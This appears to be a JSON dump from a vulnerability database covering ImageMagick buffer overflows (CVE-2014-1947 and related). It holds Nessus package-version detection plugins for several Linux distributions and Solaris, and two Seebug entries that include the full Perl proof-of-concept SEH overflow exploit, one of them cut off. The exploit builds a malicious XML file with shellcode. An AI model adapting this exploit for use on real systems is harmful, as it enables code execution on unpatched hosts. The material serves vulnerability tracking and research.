script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"ImageMagick-6.8.6.3-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:23:15", "bulletinFamily": "scanner", "description": "The remote Solaris system is missing necessary patches to address security updates.", "modified": "2018-11-15T00:00:00", "id": "SOLARIS11_IMAGEMAGICK_20140731.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80644", "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : imagemagick (multiple_buffer_errors_vulnerabilities_in2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80644);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\", \"CVE-2014-2030\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : imagemagick (multiple_buffer_errors_vulnerabilities_in2)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates.\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/multiple-buffer-errors-vulnerabilities-in-imagemagick\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ba42ea5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.2.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:imagemagick\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^imagemagick$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"imagemagick\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.0.0.0.0\", sru:\"11.2 SRU 0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : imagemagick\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"imagemagick\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:21:02", "bulletinFamily": "scanner", "description": "Several buffer overflows were found in Imagemagick, a suite of image manipulation programs. Processing malformed PSD files could lead to the execution of arbitrary code.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-2898.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73440", "published": "2014-04-10T00:00:00", "title": "Debian DSA-2898-1 : imagemagick - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2898. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73440);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\", \"CVE-2014-2030\");\n script_xref(name:\"DSA\", value:\"2898\");\n\n script_name(english:\"Debian DSA-2898-1 : imagemagick - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several buffer overflows were found in Imagemagick, a suite of image\nmanipulation programs. Processing malformed PSD files could lead to\nthe execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2898\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the imagemagick packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 8:6.6.0.4-3+squeeze4.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 8:6.7.7.10-5+deb7u3.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"imagemagick\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"imagemagick-doc\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagick++-dev\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagick++3\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagickcore3\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagickcore3-extra\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmagickwand3\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perlmagick\", reference:\"8:6.6.0.4-3+squeeze4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-common\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-dbg\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"imagemagick-doc\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++-dev\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagick++5\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore-dev\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickcore5-extra\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand-dev\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmagickwand5\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"perlmagick\", reference:\"8:6.7.7.10-5+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:22:31", "bulletinFamily": "scanner", "description": "A buffer overflow flaw was found in the way ImageMagick handled PSD images that use RLE encoding. An attacker could create a malicious PSD image file that, when opened in ImageMagick, would cause ImageMagick to crash or, potentially, execute arbitrary code with the privileges of the user running ImageMagick.\n\nA buffer overflow flaw affecting ImageMagick when creating PSD images was reported. The vulnerability is similar to CVE-2014-1947 , except that CVE-2014-2030 's format string is 'L%06ld' instead of CVE-2014-1947 's 'L%02ld' due to commit r1448.", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-336.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78279", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : ImageMagick (ALAS-2014-336)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-336.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78279);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\", \"CVE-2014-2030\");\n script_xref(name:\"ALAS\", value:\"2014-336\");\n\n script_name(english:\"Amazon Linux AMI : ImageMagick (ALAS-2014-336)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was found in the way ImageMagick handled PSD\nimages that use RLE encoding. An attacker could create a malicious PSD\nimage file that, when opened in ImageMagick, would cause ImageMagick\nto crash or, potentially, execute arbitrary code with the privileges\nof the user running ImageMagick.\n\nA buffer overflow flaw affecting ImageMagick when creating PSD images\nwas reported. The vulnerability is similar to CVE-2014-1947 , except\nthat CVE-2014-2030 's format string is 'L%06ld' instead of\nCVE-2014-1947 's 'L%02ld' due to commit r1448.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-336.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ImageMagick' to update your system.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-c++-devel-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-debuginfo-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-devel-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-doc-6.7.8.9-10.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ImageMagick-perl-6.7.8.9-10.15.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T13:31:48", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85003", "id": "SSV:85003", "type": "seebug", "title": "ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)", "sourceData": "\n #!/usr/bin/perl\r\n########################################################################################\r\n# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)\r\n# Date: 2-13-2014\r\n# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift\r\n# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)\r\n# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/\r\n# Version Tested: 6.8.8-4\r\n# Tested On: Windows XP SP3\r\n########################################################################################\r\n# Credits:\r\n# \r\n# CVE-2014-1947 published Feb 08 2014\r\n# by Justin Grant\r\n# http://www.securityfocus.com/bid/65478/info\r\n#\r\n########################################################################################\r\n# Overview:\r\n#\r\n# I saw the notice for this CVE today but there was no known published expoits so \r\n# I figured I'd put together this quick POC. Note, all app modules for the tested \r\n# version were compiled with safeSEH so my use of an OS module may require adjustment \r\n# of the offsets. There also appears to be several bad chars that fail the sploit.\r\n# For this POC I only generate a basic messagebox using FatalAppExit(). It may take \r\n# some work to get it to do more.\r\n#\r\n# How it works:\r\n# \r\n# This particular BOF takes advantage of insecure handling of the english.xml file\r\n# which the app uses to display various error messages. I didn't spend much time \r\n# investigating the app so there may be additional vulnerable locations\r\n# \r\n# This script generates two files:\r\n# 1) a malfored .bmp file that will cause ImageMagick to generate a specific\r\n# error when opened (LengthAndFilesizeDoNotMatch), as defined in the \r\n# english.xml file\r\n# 2) a modified english.xml file that replaces the original error message with \r\n# our exploit code\r\n#\r\n# To test this POC:\r\n# 1) run the script, replace the original english.xml file (in App's folder)\r\n# 2) open the .bmp file with ImageMagick\r\n########################################################################################\r\n\r\n# file write function \r\nsub write_file { \r\n my ($file, $buffer) = @_;\r\n open(FILE, ">$file");\r\n print FILE $buffer;\r\n close(FILE);\r\n print "Exploit file [" . $file . "] created\\n";\r\n print "Buffer size: " . length($buffer) . "\\n"; \r\n}\r\n\r\n# create bmp file header; needs to be a valid header to generate necessary error\r\nsub bmp_header {\r\n my $header = "\\x42\\x4d"; # BM\r\n $header = $header . "\\x46\\x00\\x00\\x00"; # file size (70 bytes)\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # unused \r\n $header = $header . "\\x36\\x00\\x00\\x00"; # bitmap offset\r\n $header = $header . "\\x28\\x00\\x00\\x00"; # header size\r\n $header = $header . "\\x02\\x00\\x00\\x00"; # width\r\n $header = $header . "\\x02\\x00\\x00\\x00"; # height\r\n $header = $header . "\\x01\\x00"; # num of color planes\r\n $header = $header . "\\x18\\x00"; # num of bits per pixel\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # compression (none)\r\n $header = $header . "\\x10\\x00\\x00\\x00"; # image size\r\n $header = $header . "\\x13\\x0b\\x00\\x00"; # horizontal resolution (2,835 pixels/meter)\r\n $header = $header . "\\x13\\x0b\\x00\\x00"; # vertical resolution (2,835 pixels/meter)\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # colors in palette\r\n $header = $header . "\\x00\\x00\\x00\\x00"; #important colors\r\n return $header;\r\n}\r\n\r\n## Construct the corrupted bmp file which will trigger the vuln\r\nmy $header = bmp_header();\r\nmy $data = "\\x41" x (5000 - length($header)); # arbitrary file data filler\r\nmy $buffer = $header.$data; \r\nwrite_file("corrupt.bmp", $buffer);\r\n\r\n# construct the buffer payload for our xml file\r\nmy $buffsize = 100000;\r\nmy $junk = "\\x41" x 62504; # offset to next seh at 568\r\nmy $nseh = "\\xeb\\x32\\x90\\x90"; # overwrite next seh with jmp instruction (20 bytes)\r\nmy $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret\r\n\t\t\t\t # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\\WINDOWS\\system32\\OLEACC.dll)\r\nmy $junk2 = "\\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button \r\nmy $nops = "\\x90" x 100;\r\n\r\n# this is just a POC shellcode that displays a messagebox using the FatalAppExit function \r\nmy $shell = "\\xb9\\x7c\\xec\\xa5\\x7c" . # Unicode String "FailSilently" (address may vary)\r\n\t "\\x31\\xc0" . # xor eax, eax\r\n\t "\\xbb\\xb2\\x1b\\x86\\x7c" . # kernel32.dll FatalAppExit()\r\n\t "\\x51" . # push ecx\r\n\t "\\x50" . # push eax\r\n\t "\\xff\\xd3"; # call ebx\r\n\r\nmy $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer\r\nmy $fill = "\\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk\r\n$sploit = $sploit.$fill; # assemble the final buffer\r\n\r\n# build the malicious xml file\r\nmy $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">'; \r\n$xml = $xml . $sploit;\r\n$xml = $xml . '</message></warning></image></corrupt></exception></locale>';\r\nmy $buffer = $xml;\r\nwrite_file("english.xml", $buffer); \r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85003", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T17:41:57", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65478\r\nCVE ID\uff1aCVE-2014-1947\r\n\r\nImageMagick\u662f\u4e00\u6b3eUnix/Linux\u5e73\u53f0\u4e0b\u5f00\u6e90\u7684\u56fe\u50cf\u67e5\u770b\u548c\u7f16\u8f91\u5de5\u5177\u3002\r\n\r\nImageMagick 6.8.8-5\u4e4b\u524d\u7248\u672c\u8fdb\u884cPSD\u56fe\u5f62\u7684RLE\u89e3\u7801\u4e2d\u51fa\u73b0\u8fb9\u754c\u9519\u8bef\uff0c\u53ef\u4f7f\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6b64\u6f0f\u6d1e\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nImageMagick ImageMagick < 6.8.8-5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nImageMagick\r\n-----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.imagemagick.org/\r\nhttp://www.imagemagick.org/script/changelog.php\r\nhttp://freecode.com/projects/imagemagick/tags/bugfixes", "modified": "2014-02-17T00:00:00", "published": "2014-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61456", "id": "SSV:61456", "title": "ImageMagick PSD\u56fe\u5f62\u6587\u4ef6\u5904\u7406\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/perl\r\n########################################################################################\r\n# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)\r\n# Date: 2-13-2014\r\n# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift\r\n# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)\r\n# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/\r\n# Version Tested: 6.8.8-4\r\n# Tested On: Windows XP SP3\r\n########################################################################################\r\n# Credits:\r\n# \r\n# CVE-2014-1947 published Feb 08 2014\r\n# by Justin Grant\r\n# http://www.securityfocus.com/bid/65478/info\r\n#\r\n########################################################################################\r\n# Overview:\r\n#\r\n# I saw the notice for this CVE today but there was no known published expoits so \r\n# I figured I'd put together this quick POC. Note, all app modules for the tested \r\n# version were compiled with safeSEH so my use of an OS module may require adjustment \r\n# of the offsets. There also appears to be several bad chars that fail the sploit.\r\n# For this POC I only generate a basic messagebox using FatalAppExit(). It may take \r\n# some work to get it to do more.\r\n#\r\n# How it works:\r\n# \r\n# This particular BOF takes advantage of insecure handling of the english.xml file\r\n# which the app uses to display various error messages. I didn't spend much time \r\n# investigating the app so there may be additional vulnerable locations\r\n# \r\n# This script generates two files:\r\n# 1) a malfored .bmp file that will cause ImageMagick to generate a specific\r\n# error when opened (LengthAndFilesizeDoNotMatch), as defined in the \r\n# english.xml file\r\n# 2) a modified english.xml file that replaces the original error message with \r\n# our exploit code\r\n#\r\n# To test this POC:\r\n# 1) run the script, replace the original english.xml file (in App's folder)\r\n# 2) open the .bmp file with ImageMagick\r\n########################################################################################\r\n \r\n# file write function \r\nsub write_file { \r\n my ($file, $buffer) = @_;\r\n open(FILE, ">$file");\r\n print FILE $buffer;\r\n close(FILE);\r\n print "Exploit file [" . $file . "] created\\n";\r\n print "Buffer size: " . length($buffer) . "\\n"; \r\n}\r\n \r\n# create bmp file header; needs to be a valid header to generate necessary error\r\nsub bmp_header {\r\n my $header = "\\x42\\x4d"; # BM\r\n $header = $header . "\\x46\\x00\\x00\\x00"; # file size (70 bytes)\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # unused \r\n $header = $header . "\\x36\\x00\\x00\\x00"; # bitmap offset\r\n $header = $header . "\\x28\\x00\\x00\\x00"; # header size\r\n $header = $header . "\\x02\\x00\\x00\\x00"; # width\r\n $header = $header . "\\x02\\x00\\x00\\x00"; # height\r\n $header = $header . "\\x01\\x00"; # num of color planes\r\n $header = $header . "\\x18\\x00"; # num of bits per pixel\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # compression (none)\r\n $header = $header . "\\x10\\x00\\x00\\x00"; # image size\r\n $header = $header . "\\x13\\x0b\\x00\\x00"; # horizontal resolution (2,835 pixels/meter)\r\n $header = $header . "\\x13\\x0b\\x00\\x00"; # vertical resolution (2,835 pixels/meter)\r\n $header = $header . "\\x00\\x00\\x00\\x00"; # colors in palette\r\n $header = $header . "\\x00\\x00\\x00\\x00"; #important colors\r\n return $header;\r\n}\r\n \r\n## Construct the corrupted bmp file which will trigger the vuln\r\nmy $header = bmp_header();\r\nmy $data = "\\x41" x (5000 - length($header)); # arbitrary file data filler\r\nmy $buffer = $header.$data; \r\nwrite_file("corrupt.bmp", $buffer);\r\n \r\n# construct the buffer payload for our xml file\r\nmy $buffsize = 100000;\r\nmy $junk = "\\x41" x 62504; # offset to next seh at 568\r\nmy $nseh = "\\xeb\\x32\\x90\\x90"; # overwrite next seh with jmp instruction (20 bytes)\r\nmy $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret\r\n # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\\WINDOWS\\system32\\OLEACC.dll)\r\nmy $junk2 = "\\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button \r\nmy $nops = "\\x90" x 100;\r\n \r\n# this is just a POC shellcode that displays a messagebox using the FatalAppExit function \r\nmy $shell = "\\xb9\\x7c\\xec\\xa5\\x7c" . # Unicode String "FailSilently" (address may vary)\r\n "\\x31\\xc0" . # xor eax, eax\r\n "\\xbb\\xb2\\x1b\\x86\\x7c" . # kernel32.dll FatalAppExit()\r\n "\\x51" . # push ecx\r\n "\\x50" . # push eax\r\n "\\xff\\xd3"; # call ebx\r\n \r\nmy $sploit = 